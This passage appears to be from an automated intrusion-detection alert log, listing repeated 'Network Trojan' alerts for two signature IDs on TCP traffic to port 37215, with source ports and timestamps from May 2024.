          SID:2829579
          Source Port:42048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183820
          SID:2835222
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328984
          SID:2829579
          Source Port:35574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039186
          SID:2829579
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063233
          SID:2829579
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190309
          SID:2829579
          Source Port:33936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793913
          SID:2835222
          Source Port:42238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399922
          SID:2835222
          Source Port:48042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764618
          SID:2829579
          Source Port:58340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324272
          SID:2835222
          Source Port:35478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201505
          SID:2835222
          Source Port:41708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511626
          SID:2835222
          Source Port:60138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355836
          SID:2829579
          Source Port:59688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843382
          SID:2829579
          Source Port:45106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045311
          SID:2829579
          Source Port:37174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411917
          SID:2829579
          Source Port:59066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734788
          SID:2835222
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591188
          SID:2829579
          Source Port:46084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067338
          SID:2829579
          Source Port:53408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965146
          SID:2835222
          Source Port:59406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493259
          SID:2835222
          Source Port:50420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156293
          SID:2829579
          Source Port:57446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147286
          SID:2835222
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208285
          SID:2835222
          Source Port:47776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590935
          SID:2829579
          Source Port:35584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339666
          SID:2829579
          Source Port:39472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338685
          SID:2829579
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847728
          SID:2835222
          Source Port:40040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325790
          SID:2835222
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152063
          SID:2829579
          Source Port:45290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914629
          SID:2829579
          Source Port:44064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.058008
          SID:2835222
          Source Port:54194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543497
          SID:2835222
          Source Port:35536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760132
          SID:2835222
          Source Port:52252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851599
          SID:2835222
          Source Port:40756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167575
          SID:2829579
          Source Port:45610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228799
          SID:2829579
          Source Port:39180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680293
          SID:2835222
          Source Port:50796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311128
          SID:2835222
          Source Port:48642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178553
          SID:2835222
          Source Port:35218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876245
          SID:2829579
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327899
          SID:2829579
          Source Port:43738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804666
          SID:2835222
          Source Port:52300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285871
          SID:2829579
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473712
          SID:2829579
          Source Port:51958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291764
          SID:2835222
          Source Port:39804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203777
          SID:2829579
          Source Port:41302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594713
          SID:2835222
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239083
          SID:2829579
          Source Port:43514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561843
          SID:2829579
          Source Port:54584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266197
          SID:2835222
          Source Port:34700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197765
          SID:2835222
          Source Port:51450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849262
          SID:2835222
          Source Port:58612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045295
          SID:2829579
          Source Port:33674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.237618
          SID:2829579
          Source Port:59594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291462
          SID:2835222
          Source Port:56024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484765
          SID:2829579
          Source Port:36266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178126
          SID:2829579
          Source Port:42750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549134
          SID:2835222
          Source Port:41290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922098
          SID:2829579
          Source Port:39986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210188
          SID:2835222
          Source Port:47830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794209
          SID:2829579
          Source Port:55428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183670
          SID:2835222
          Source Port:37680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401613
          SID:2835222
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592993
          SID:2835222
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242640
          SID:2829579
          Source Port:49818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.759205
          SID:2829579
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711145
          SID:2829579
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960332
          SID:2835222
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185889
          SID:2829579
          Source Port:41914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268359
          SID:2835222
          Source Port:55092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704957
          SID:2829579
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847040
          SID:2829579
          Source Port:49762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338022
          SID:2835222
          Source Port:39742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089702
          SID:2835222
          Source Port:56856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329582
          SID:2829579
          Source Port:39504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299093
          SID:2829579
          Source Port:57094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154321
          SID:2829579
          Source Port:40368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203793
          SID:2835222
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849113
          SID:2835222
          Source Port:40182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067897
          SID:2835222
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819050
          SID:2835222
          Source Port:42144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891769
          SID:2835222
          Source Port:57174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178086
          SID:2835222
          Source Port:48022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046954
          SID:2835222
          Source Port:33928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466085
          SID:2835222
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299627
          SID:2835222
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156954
          SID:2829579
          Source Port:43714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653062
          SID:2835222
          Source Port:47368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963957
          SID:2829579
          Source Port:54534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.126863
          SID:2829579
          Source Port:46518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.610313
          SID:2829579
          Source Port:40352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033347
          SID:2835222
          Source Port:46380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422045
          SID:2829579
          Source Port:34028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975173
          SID:2835222
          Source Port:48764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845092
          SID:2835222
          Source Port:42772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126518
          SID:2835222
          Source Port:48998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273456
          SID:2829579
          Source Port:59380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164507
          SID:2829579
          Source Port:55504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664458
          SID:2829579
          Source Port:49784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846827
          SID:2829579
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689065
          SID:2829579
          Source Port:60090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160156
          SID:2829579
          Source Port:40078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267650
          SID:2835222
          Source Port:43642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591354
          SID:2829579
          Source Port:60146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691210
          SID:2835222
          Source Port:38132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807219
          SID:2829579
          Source Port:49006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663056
          SID:2835222
          Source Port:40244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668862
          SID:2835222
          Source Port:39984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167622
          SID:2829579
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976669
          SID:2829579
          Source Port:41000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341382
          SID:2829579
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474641
          SID:2835222
          Source Port:35486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938661
          SID:2835222
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985137
          SID:2829579
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664672
          SID:2829579
          Source Port:53888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089594
          SID:2835222
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710968
          SID:2829579
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234555
          SID:2835222
          Source Port:54814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627532
          SID:2829579
          Source Port:60392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756373
          SID:2835222
          Source Port:38236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075860
          SID:2829579
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528836
          SID:2835222
          Source Port:57940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925479
          SID:2829579
          Source Port:48936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874106
          SID:2835222
          Source Port:58138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141706
          SID:2835222
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528912
          SID:2835222
          Source Port:52616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842098
          SID:2829579
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.270972
          SID:2835222
          Source Port:47030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088076
          SID:2829579
          Source Port:52694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974940
          SID:2835222
          Source Port:56430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711128
          SID:2829579
          Source Port:34004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651498
          SID:2835222
          Source Port:49600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711531
          SID:2835222
          Source Port:52250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820994
          SID:2835222
          Source Port:50004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804541
          SID:2829579
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297636
          SID:2829579
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850669
          SID:2835222
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298799
          SID:2829579
          Source Port:37856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984382
          SID:2829579
          Source Port:33360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039898
          SID:2829579
          Source Port:56038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741463
          SID:2835222
          Source Port:52230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325559
          SID:2829579
          Source Port:52556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298318
          SID:2835222
          Source Port:38306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206245
          SID:2829579
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664480
          SID:2829579
          Source Port:57600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039069
          SID:2835222
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268680
          SID:2835222
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848360
          SID:2829579
          Source Port:56408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704750
          SID:2835222
          Source Port:46220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338630
          SID:2829579
          Source Port:52184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551215
          SID:2829579
          Source Port:38046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.230986
          SID:2835222
          Source Port:41854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973116
          SID:2835222
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265659
          SID:2835222
          Source Port:41638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227566
          SID:2829579
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205682
          SID:2835222
          Source Port:53810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266253
          SID:2829579
          Source Port:45926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858395
          SID:2835222
          Source Port:58622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048638
          SID:2835222
          Source Port:52940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.378877
          SID:2835222
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793374
          SID:2829579
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152134
          SID:2835222
          Source Port:42566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848155
          SID:2829579
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845144
          SID:2829579
          Source Port:48342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405230
          SID:2829579
          Source Port:47822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154670
          SID:2829579
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547755
          SID:2835222
          Source Port:55112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818977
          SID:2829579
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320997
          SID:2829579
          Source Port:34578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171363
          SID:2835222
          Source Port:53302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181667
          SID:2835222
          Source Port:48082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689296
          SID:2835222
          Source Port:49044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175500
          SID:2829579
          Source Port:47954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269720
          SID:2835222
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065336
          SID:2835222
          Source Port:60100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626873
          SID:2835222
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188136
          SID:2829579
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704040
          SID:2829579
          Source Port:45648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528853
          SID:2835222
          Source Port:54088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269801
          SID:2835222
          Source Port:49978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879158
          SID:2835222
          Source Port:54502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486571
          SID:2835222
          Source Port:45976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143066
          SID:2829579
          Source Port:41142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797794
          SID:2835222
          Source Port:38134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272305
          SID:2829579
          Source Port:43656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079538
          SID:2835222
          Source Port:51176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048555
          SID:2829579
          Source Port:55626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103003
          SID:2829579
          Source Port:52548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542668
          SID:2835222
          Source Port:49732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591763
          SID:2829579
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299721
          SID:2829579
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103040
          SID:2829579
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861569
          SID:2835222
          Source Port:47288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987494
          SID:2829579
          Source Port:58440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399964
          SID:2835222
          Source Port:43144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657129
          SID:2829579
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626413
          SID:2829579
          Source Port:37070
          Destination Port:37215
